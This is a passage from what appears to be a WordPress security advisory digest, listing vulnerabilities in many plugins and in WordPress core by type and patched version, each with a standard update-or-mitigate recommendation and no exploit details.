Recommended Action: Update to version 8.3.5, or a newer patched version

Plugin: Peter’s Math Anti-Spam

Vulnerability: CAPTCHA Bypass
Patched Version: 1.0.0
Recommended Action: Update to version 1.0.0, or a newer patched version

Plugin: Upload Resume

Vulnerability: Captcha Bypass via resume_upload_form
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP Prayer

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 1.6.2
Recommended Action: Update to version 1.6.2, or a newer patched version

Plugin: Ninja Tables – Easy Data Table Builder

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting via plugin settings
Patched Version: 4.3.5
Recommended Action: Update to version 4.3.5, or a newer patched version

Plugin: AI ChatBot for WordPress – WPBot

Vulnerability: Not specified; the entry lists only the affected version (4.9.6)
Patched Version: 4.9.7
Recommended Action: Update to version 4.9.7, or a newer patched version

Plugin: Testimonial – Testimonial Slider and Showcase Plugin

Vulnerability: Stored Cross-Site Scripting
Patched Version: 2.2.7
Recommended Action: Update to version 2.2.7, or a newer patched version

Plugin: Bulk Price Update for Woocommerce

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.2.2
Recommended Action: Update to version 2.2.2, or a newer patched version

Plugin: Caldera Forms – More Than Contact Forms

Vulnerability: Cross-Site Request Forgery to Stored Cross-Site Scripting
Patched Version: 1.4.2
Recommended Action: Update to version 1.4.2, or a newer patched version

Plugin: WP Discord Invite

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 2.5.2
Recommended Action: Update to version 2.5.2, or a newer patched version

Plugin: wpCommentTwit

Vulnerability: Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Checkfront Online Booking System

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.7
Recommended Action: Update to version 3.7, or a newer patched version

Plugin: Popup Maker – Boost Sales, Conversions, Optins, Subscribers with the Ultimate WP Popups Builder

Vulnerability: Authenticated (Contributor+) Cross-Site Scripting
Patched Version: 1.16.9
Recommended Action: Update to version 1.16.9, or a newer patched version

Plugin: Menu Bar Cart Icon For WooCommerce By Binary Carpenter

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP SEO TDK

Vulnerability: Missing Authorization to Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP Coder – Code Snippets + HTML, CSS, JS and PHP Injection

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.5.3
Recommended Action: Update to version 2.5.3, or a newer patched version

Plugin: Jetpack – WP Security, Backup, Speed, & Growth

Vulnerability: Timing Attack
Patched Version: 4.2
Recommended Action: Update to version 4.2, or a newer patched version

Plugin: moreAds SE

Vulnerability: Cross-Site Scripting
Patched Version: 1.4.7
Recommended Action: Update to version 1.4.7, or a newer patched version

Plugin: Store Locator Plus® for WordPress

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 5.13.8
Recommended Action: Update to version 5.13.8, or a newer patched version

Plugin: Comment Blacklist Updater

Vulnerability: Cross-Site Request Forgery via update_blacklist_manual
Patched Version: 1.2.0
Recommended Action: Update to version 1.2.0, or a newer patched version

Plugin: wp-noexternallinks

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.5.16
Recommended Action: Update to version 3.5.16, or a newer patched version

Plugin: Traffic Manager

Vulnerability: Missing Authorization to Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Merge + Minify + Refresh

Vulnerability: Cross-Site Request Forgery leading to Arbitrary File Deletion and Site Reset
Patched Version: 1.10.8
Recommended Action: Update to version 1.10.8, or a newer patched version

Plugin: Patreon WordPress

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.7.2
Recommended Action: Update to version 1.7.2, or a newer patched version

Plugin: lim4wp

Vulnerability: Arbitrary File Upload
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Login as User or Customer

Vulnerability: Privilege Escalation
Patched Version: 3.3
Recommended Action: Update to version 3.3, or a newer patched version

Plugin: Contact Form by WD – responsive drag & drop contact form builder tool

Vulnerability: Authorization Bypass
Patched Version: 1.7.19
Recommended Action: Update to version 1.7.19, or a newer patched version

Plugin: WP Glossary

Vulnerability: Missing Authorization
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Quiz and Survey Master (QSM) – Easy Quiz and Survey Maker

Vulnerability: Cross-Site Scripting
Patched Version: 7.1.14
Recommended Action: Update to version 7.1.14, or a newer patched version

Plugin: WordPress Simple HTML Sitemap

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 2.5
Recommended Action: Update to version 2.5, or a newer patched version

Plugin: Very Simple Google Maps

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 2.9.1
Recommended Action: Update to version 2.9.1, or a newer patched version

Plugin: Availability Calendar

Vulnerability: SQL Injection
Patched Version: 1.2.1
Recommended Action: Update to version 1.2.1, or a newer patched version

Plugin: AMP extensions

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: bbPress

Vulnerability: Stored Cross-Site Scripting
Patched Version: 2.5.9
Recommended Action: Update to version 2.5.9, or a newer patched version

Plugin: WP Fastest Cache

Vulnerability: Missing Authorization
Patched Version: 0.8.5.8
Recommended Action: Update to version 0.8.5.8, or a newer patched version

Plugin: Custom Colors for Real Estate Manager

Vulnerability: Authenticated (Subscriber+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Product Vendors

Vulnerability: Missing Authorization
Patched Version: 2.2.2
Recommended Action: Update to version 2.2.2, or a newer patched version

Plugin: Responsive Lightbox & Gallery

Vulnerability: Cross-Site Scripting
Patched Version: 1.7.2
Recommended Action: Update to version 1.7.2, or a newer patched version

Plugin: User Email Verification for WooCommerce

Vulnerability: Improper Access Control
Patched Version: 3.2.0
Recommended Action: Update to version 3.2.0, or a newer patched version

Plugin: Shield: Blocks Bots, Protects Users, and Prevents Security Breaches

Vulnerability: Unauthenticated Stored Cross-Site Scripting via getColumnContent_Page
Patched Version: 18.5.8
Recommended Action: Update to version 18.5.8, or a newer patched version

Plugin: SlimStat Analytics

Vulnerability: Authenticated (Subscriber+) SQL Injection via Shortcode
Patched Version: 4.9.3.3
Recommended Action: Update to version 4.9.3.3, or a newer patched version

Core: WordPress

Vulnerability: Information Disclosure
Patched Version: 3.4.1
Recommended Action: Update to version 3.4.1, or a newer patched version

Plugin: Style It

Vulnerability: Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Scout bazar

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.3.4
Recommended Action: Update to version 1.3.4, or a newer patched version

Plugin: nuajik

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: RegistrationMagic – Custom Registration Forms, User Registration, Payment, and User Login

Vulnerability: Cross-Site Request Forgery leading to Form Metadata Deletion
Patched Version: 5.1.9.3
Recommended Action: Update to version 5.1.9.3, or a newer patched version

Plugin: Custom My Account for Woocommerce

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: SP Project & Document Manager

Vulnerability: Cross-Site Scripting
Patched Version: 2.6.1.4
Recommended Action: Update to version 2.6.1.4, or a newer patched version

Plugin: Code Snippets

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.7.0
Recommended Action: Update to version 2.7.0, or a newer patched version

Plugin: Flexible Checkout Fields for WooCommerce – WooCommerce Checkout Manager

Vulnerability: Unauthenticated Arbitrary Plugin Settings Update
Patched Version: 2.3.2
Recommended Action: Update to version 2.3.2, or a newer patched version

Plugin: RestroPress – Online Food Ordering System

Vulnerability: Missing Authorization
Patched Version: 2.8.3.1
Recommended Action: Update to version 2.8.3.1, or a newer patched version

Plugin: Email Subscribers by Icegram Express – Affordable, Powerful Email Marketing for WordPress & WooCommerce

Vulnerability: Cross-Site Request Forgery
Patched Version: 4.5.1
Recommended Action: Update to version 4.5.1, or a newer patched version

Plugin: WDSocialWidgets

Vulnerability: SQL Injection
Patched Version: 1.0.9
Recommended Action: Update to version 1.0.9, or a newer patched version

Plugin: Image Gallery – Responsive Photo Gallery

Vulnerability: Not specified; the entry lists only the affected versions (Responsive Photo Gallery <= 1.5.5)
Patched Version: 1.5.6
Recommended Action: Update to version 1.5.6, or a newer patched version

Plugin: ARMember – Membership Plugin, Content Restriction, Member Levels, User Profile & User signup

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 4.0.1
Recommended Action: Update to version 4.0.1, or a newer patched version

Core: WordPress

Vulnerability: Open Redirect
Patched Version: 3.7.26
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.26, 3.8.26, 3.9.24, 4.0.23, 4.1.23, 4.2.20, 4.3.16, 4.4.15, 4.5.14, 4.6.11, 4.7.10, 4.8.6, 4.9.5

Plugin: Note Press

Vulnerability: Authenticated (Admin+) SQL Injection via Update
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: KJM Admin Notices

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Open Graphite

Vulnerability: Reflected Cross-Site Scripting via topic parameter
Patched Version: 1.6.1
Recommended Action: Update to version 1.6.1, or a newer patched version

Plugin: WordPress Console

Vulnerability: Missing Authorization via reload.php
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: NextGEN Gallery Sell Photo

Vulnerability: Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Contact Form 7 Integrations

Vulnerability: Not specified; the entry lists only the affected version (1.3.10)
Patched Version: 1.3.11
Recommended Action: Update to version 1.3.11, or a newer patched version

Core: WordPress

Vulnerability: Authorization Bypass
Patched Version: 3.7.17
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.17, 3.8.17, 3.9.15, 4.0.14, 4.1.14, 4.2.11, 4.3.7, 4.4.6, 4.5.5, 4.6.2, 4.7.1

Plugin: Elementor Addon Elements

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.12.8
Recommended Action: Update to version 1.12.8, or a newer patched version

Plugin: Brizy – Page Builder

Vulnerability: Authenticated File Upload and Path Traversal
Patched Version: 2.3.12
Recommended Action: Update to version 2.3.12, or a newer patched version

Plugin: WordPress File Upload

Vulnerability: Stored Cross-Site Scripting
Patched Version: 4.3.4
Recommended Action: Update to version 4.3.4, or a newer patched version

Plugin: WP Customer Reviews

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 3.5.6
Recommended Action: Update to version 3.5.6, or a newer patched version

Plugin: Two Factor Authentication

Vulnerability: Cross-Site Scripting
Patched Version: 1.1.10
Recommended Action: Update to version 1.1.10, or a newer patched version

Plugin: Ruby Help Desk

Vulnerability: Missing Authorization to Arbitrary Ticket Modification
Patched Version: 1.3.4
Recommended Action: Update to version 1.3.4, or a newer patched version

Plugin: Automatic User Roles Switcher

Vulnerability: Missing Authorization to Privilege Escalation
Patched Version: 1.1.2
Recommended Action: Update to version 1.1.2, or a newer patched version

Plugin: Awesome Support – WordPress HelpDesk & Support Plugin

Vulnerability: Arbitrary Shortcode Execution
Patched Version: 3.1.7
Recommended Action: Update to version 3.1.7, or a newer patched version

Plugin: Shockingly Simple Favicon

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: NEX-Forms – Ultimate Form Builder – Contact forms and much more

Vulnerability: Not specified; the entry lists only the affected versions (Ultimate Form Builder <= 8.3.2)
Patched Version: 8.3.3
Recommended Action: Update to version 8.3.3, or a newer patched version

Plugin: WordPress Classifieds Plugin – Ad Directory & Listings by AWP Classifieds

Vulnerability: Cross-Site Scripting
Patched Version: 3.0
Recommended Action: Update to version 3.0, or a newer patched version

Plugin: WordPress File Upload

Vulnerability: Arbitrary File Upload
Patched Version: 3.4.1
Recommended Action: Update to version 3.4.1, or a newer patched version

Plugin: Booking Ultra Pro Appointments Booking Calendar Plugin

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 1.1.9
Recommended Action: Update to version 1.1.9, or a newer patched version

Plugin: FeedStats

Vulnerability: Cross-Site Scripting
Patched Version: 2.4
Recommended Action: Update to version 2.4, or a newer patched version

Plugin: CAPTCHA 4WP – Antispam CAPTCHA solution for WordPress

Vulnerability: Cross-Site Request Forgery to Local File Inclusion
Patched Version: 7.1.0
Recommended Action: Update to version 7.1.0, or a newer patched version

Plugin: Block Referer Spam

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.1.9.5
Recommended Action: Update to version 1.1.9.5, or a newer patched version

Plugin: Popup Builder – Create highly converting, mobile friendly marketing popups.

Vulnerability: Cross-Site Request Forgery to Settings Update
Patched Version: 4.1.12
Recommended Action: Update to version 4.1.12, or a newer patched version

Plugin: Community by PeepSo – Download from PeepSo.com

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 6.2.7.0
Recommended Action: Update to version 6.2.7.0, or a newer patched version

Plugin: WP Yelp Review Slider

Vulnerability: Authenticated (Subscriber+) SQL Injection
Patched Version: 7.1
Recommended Action: Update to version 7.1, or a newer patched version

Plugin: SrbTransLatin – Serbian Latinisation

Vulnerability: Stored/Reflected Cross-Site Scripting via Third Party Library
Patched Version: 2.4.1
Recommended Action: Update to version 2.4.1, or a newer patched version

Plugin: Ninja Forms – The Contact Form Builder That Grows With You

Vulnerability: Cross-Site Request Forgery to Plugin Installation
Patched Version: 3.4.27.1
Recommended Action: Update to version 3.4.27.1, or a newer patched version

Plugin: WP Photo Album Plus

Vulnerability: Stored Cross-Site Scripting
Patched Version: 5.4.8
Recommended Action: Update to version 5.4.8, or a newer patched version

Plugin: WP All Export Pro

Vulnerability: Cross-Site Request Forgery to PHAR Deserialization
Patched Version: 1.8.6
Recommended Action: Update to version 1.8.6, or a newer patched version

Plugin: RSVPMaker

Vulnerability: SQL Injection
Patched Version: 5.6.4
Recommended Action: Update to version 5.6.4, or a newer patched version

Plugin: Video Gallery – YouTube Playlist, Channel Gallery by YotuWP

Vulnerability: Authenticated (Admin+) Cross-Site Scripting
Patched Version: 1.3.11
Recommended Action: Update to version 1.3.11, or a newer patched version

Plugin: Redirection

Vulnerability: Cross-Site Request Forgery via ‘instantEditRedirect’ function
Patched Version: 1.1.4
Recommended Action: Update to version 1.1.4, or a newer patched version

Plugin: Contact Form by FormGet – Best Form Builder Plugin for WordPress

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: HashBar – WordPress Notification Bar

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 1.3.6
Recommended Action: Update to version 1.3.6, or a newer patched version

Plugin: RegistrationMagic – Custom Registration Forms, User Registration, Payment, and User Login

Vulnerability: Missing Authorization to Unauthenticated Content Injection
Patched Version: 5.1.9.3
Recommended Action: Update to version 5.1.9.3, or a newer patched version

Plugin: CM WordPress Search And Replace Plugin

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.3.1
Recommended Action: Update to version 1.3.1, or a newer patched version

Plugin: DrawBlog

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP Hardening (discontinued)

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.2.2
Recommended Action: Update to version 1.2.2, or a newer patched version

Plugin: Wordfence Security – Firewall, Malware Scan, and Login Security

Vulnerability: Stored Cross-Site Scripting via REQUEST_URI
Patched Version: 5.2.4
Recommended Action: Update to version 5.2.4, or a newer patched version

Plugin: Simple File List

Vulnerability: Arbitrary File Deletion
Patched Version: 3.2.5
Recommended Action: Update to version 3.2.5, or a newer patched version

Plugin: YITH WooCommerce Compare

Vulnerability: Unauthenticated PHP Object Injection
Patched Version: 2.1.0
Recommended Action: Update to version 2.1.0, or a newer patched version

Plugin: WordPress GDPR

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.9.27
Recommended Action: Update to version 1.9.27, or a newer patched version

Plugin: Translate WordPress with GTranslate

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.8.52
Recommended Action: Update to version 2.8.52, or a newer patched version

Plugin: Media File Organizer

Vulnerability: Directory Traversal
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP RSS Multi Importer

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.14
Recommended Action: Update to version 3.14, or a newer patched version

Plugin: Locations

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Core: WordPress

Vulnerability: Cross-Site Scripting via Javascript: and Data: URLs
Patched Version: 3.7.22
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.22, 3.8.22, 3.9.20, 4.0.19, 4.1.19, 4.2.16, 4.3.12, 4.4.11, 4.5.10, 4.6.7, 4.7.6, 4.8.2

Plugin: ReFlex Gallery » WordPress Photo Gallery

Vulnerability: Arbitrary File Upload
Patched Version: 3.1.4
Recommended Action: Update to version 3.1.4, or a newer patched version

Plugin: Users Ultra Membership, Users Community and Member Profiles With PayPal Integration Plugin

Vulnerability: Cross-Site Scripting
Patched Version: 1.5.63
Recommended Action: Update to version 1.5.63, or a newer patched version

Plugin: JobSearch WP Job Board

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.5.2
Recommended Action: Update to version 1.5.2, or a newer patched version

Plugin: Lana Email Tester

Vulnerability: Missing Authorization to Mail Relay & Cross-Site Request Forgery
Patched Version: 1.1.0
Recommended Action: Update to version 1.1.0, or a newer patched version

Plugin: Uji Countdown

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 2.3.1
Recommended Action: Update to version 2.3.1, or a newer patched version

Plugin: WP Responsive Tabs horizontal vertical and accordion Tabs

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.1.16
Recommended Action: Update to version 1.1.16, or a newer patched version

Plugin: Multi Step Form

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.2.6
Recommended Action: Update to version 1.2.6, or a newer patched version

Plugin: Simple Gmail Login

Vulnerability: Sensitive Information Disclosure
Patched Version: 1.1.4
Recommended Action: Update to version 1.1.4, or a newer patched version

Plugin: Pricing Table

Vulnerability: Authenticated (Author+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Category Order and Taxonomy Terms Order

Vulnerability: Authenticated PHP Object Injection
Patched Version: 1.5.3
Recommended Action: Update to version 1.5.3, or a newer patched version

Plugin: Responsive Vertical Icon Menu

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.5.9
Recommended Action: Update to version 1.5.9, or a newer patched version

Plugin: URL Shortify – Simple, Powerful and Easy URL Shortener Plugin For WordPress

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 1.7.0
Recommended Action: Update to version 1.7.0, or a newer patched version

Plugin: AdminOnline

Vulnerability: Directory Traversal/Arbitrary File Read
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: S3 Bubble Amazon S3 HTML5 Video with Adverts

Vulnerability: Arbitrary File Download
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: One Click Demo Import

Vulnerability: Authenticated (Admin+) Arbitrary File Upload
Patched Version: 3.1.0
Recommended Action: Update to version 3.1.0, or a newer patched version

Plugin: Calendar

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.3.3
Recommended Action: Update to version 1.3.3, or a newer patched version

Plugin: wpForo Forum

Vulnerability: SQL Injection
Patched Version: 1.4.13
Recommended Action: Update to version 1.4.13, or a newer patched version

Plugin: Easy Social Icons

Vulnerability: SQL Injection
Patched Version: 1.2.4
Recommended Action: Update to version 1.2.4, or a newer patched version

Plugin: Download Manager

Vulnerability: Unauthenticated Brute Force of File Master Key
Patched Version: 3.2.39
Recommended Action: Update to version 3.2.39, or a newer patched version

Plugin: Timed Popup WordPress Plugin

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Google XML Sitemap for Videos

Vulnerability: Cross-Site Request Forgery via video_sitemap_generate
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: W4 Post List

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via ‘w4pl[no_items_text]’
Patched Version: 2.4.5
Recommended Action: Update to version 2.4.5, or a newer patched version

Plugin: Better Follow Button for Jetpack

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Job Manager

Vulnerability: Insecure Direct Object Reference
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: CalderaWP License Manager

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: oEmbed Gist

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: HTTP Headers

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.19.0
Recommended Action: Update to version 1.19.0, or a newer patched version

Plugin: Auto Limit Posts Reloaded

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Bulk Page Creator

Vulnerability: Cross-Site Request Forgery to Arbitrary Page Creation
Patched Version: 1.1.4
Recommended Action: Update to version 1.1.4, or a newer patched version

Plugin: RegistrationMagic – Custom Registration Forms, User Registration, Payment, and User Login

Vulnerability: Improper Authorization to Price Change
Patched Version: 5.1.9.3
Recommended Action: Update to version 5.1.9.3, or a newer patched version

Plugin: AnyComment

Vulnerability: Cross-Site Request Forgery
Patched Version: 0.2.18
Recommended Action: Update to version 0.2.18, or a newer patched version

Plugin: WPGYM – WordPress Gym Management System

Vulnerability: WordPress Gym Management System (Unknown Version)
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Easy Admin Menu

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Product Views for WooCommerce – Product Slider, Grid, Ticker, List & Masonry

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 1.5.9
Recommended Action: Update to version 1.5.9, or a newer patched version

Plugin: Simple File List

Vulnerability: Arbitrary File Download
Patched Version: 3.2.8
Recommended Action: Update to version 3.2.8, or a newer patched version

Plugin: Translate WordPress with GTranslate

Vulnerability: Missing Authorization to Sensitive Information Disclosure
Patched Version: 2.9.9
Recommended Action: Update to version 2.9.9, or a newer patched version

Plugin: Calendar

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.3.8
Recommended Action: Update to version 1.3.8, or a newer patched version

Plugin: Bus Ticket Booking with Seat Reservation – WpBusTicketly | WordPress plugin

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 5.2.4
Recommended Action: Update to version 5.2.4, or a newer patched version

Plugin: Vuukle Comments, Reactions, Share Bar, Revenue

Vulnerability: Cross-Site Request Forgery Bypass
Patched Version: 4.0
Recommended Action: Update to version 4.0, or a newer patched version

Plugin: CM Pop-Up Banners for WordPress

Vulnerability: Authenticated (Subscriber+) SQL Injection via getStatistics
Patched Version: 1.6.0
Recommended Action: Update to version 1.6.0, or a newer patched version

Plugin: WordPress Shortcodes

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: UserPro – Community and User Profile WordPress Plugin

Vulnerability: Privilege Escalation
Patched Version: 4.9.21
Recommended Action: Update to version 4.9.21, or a newer patched version

Plugin: MainWP Child Reports

Vulnerability: Admin+ SQL Injection
Patched Version: 2.0.8
Recommended Action: Update to version 2.0.8, or a newer patched version

Core: WordPress

Vulnerability: SQL Injection via WP_Date_Query
Patched Version: 3.7.40
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.40, 3.8.40, 3.9.38, 4.0.37, 4.1.37, 4.2.34, 4.3.30, 4.4.29, 4.5.28, 4.6.25, 4.7.25, 4.8.21, 4.9.22, 5.0.18, 5.1.15, 5.2.17, 5.3.14, 5.4.12, 5.5.11, 5.6.10, 5.7.8, 5.8.6, 5.9.5, 6.0.3

Plugin: GamiPress – Gamification plugin to reward points, achievements, badges & ranks in WordPress

Vulnerability: Cross-Site Request Forgery to User Earnings Deletion
Patched Version: 2.5.7
Recommended Action: Update to version 2.5.7, or a newer patched version

Plugin: Directory Listings WordPress plugin – uListing

Vulnerability: Unauthenticated Options Changes via wp_route
Patched Version: 1.7
Recommended Action: Update to version 1.7, or a newer patched version

Plugin: Email Subscribers by Icegram Express – Affordable, Powerful Email Marketing for WordPress & WooCommerce

Vulnerability: Unauthenticated Option Creation
Patched Version: 4.2.3
Recommended Action: Update to version 4.2.3, or a newer patched version

Plugin: Accordion

Vulnerability: Authenticated (Editor+) Stored Cross-Site Scripting via accordion settings
Patched Version: 2.7
Recommended Action: Update to version 2.7, or a newer patched version

Plugin: Professional Social Sharing Buttons, Icons & Related Posts – Shareaholic

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 9.7.9
Recommended Action: Update to version 9.7.9, or a newer patched version

Plugin: Browser and Operating System Finder

Vulnerability: Missing Authorization
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: 3D Flick Slideshow

Vulnerability: Arbitrary File Upload
Patched Version: 2.2
Recommended Action: Update to version 2.2, or a newer patched version

Plugin: Googmonify

Vulnerability: Cross-Site Request Forgery to Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Auto YouTube Importer

